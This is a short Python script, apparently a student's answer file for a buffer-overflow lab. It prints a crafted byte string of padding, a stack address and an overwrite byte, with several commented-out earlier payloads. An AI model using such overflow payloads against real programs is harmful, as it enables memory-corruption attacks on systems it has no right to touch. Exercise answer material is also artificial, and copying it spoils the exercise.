#!/usr/bin/env python3

import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE HERE ###
#print('A' * 54 + '\x01')
#print('\x69')
#print('a' * 4 + '\x98\xdf\xff\xff' + 'a' * 56 + '\xb8')
print('a' * 4 + '\xb8\xff\xdf\xdf' + 'a' * 56 + '\x44')
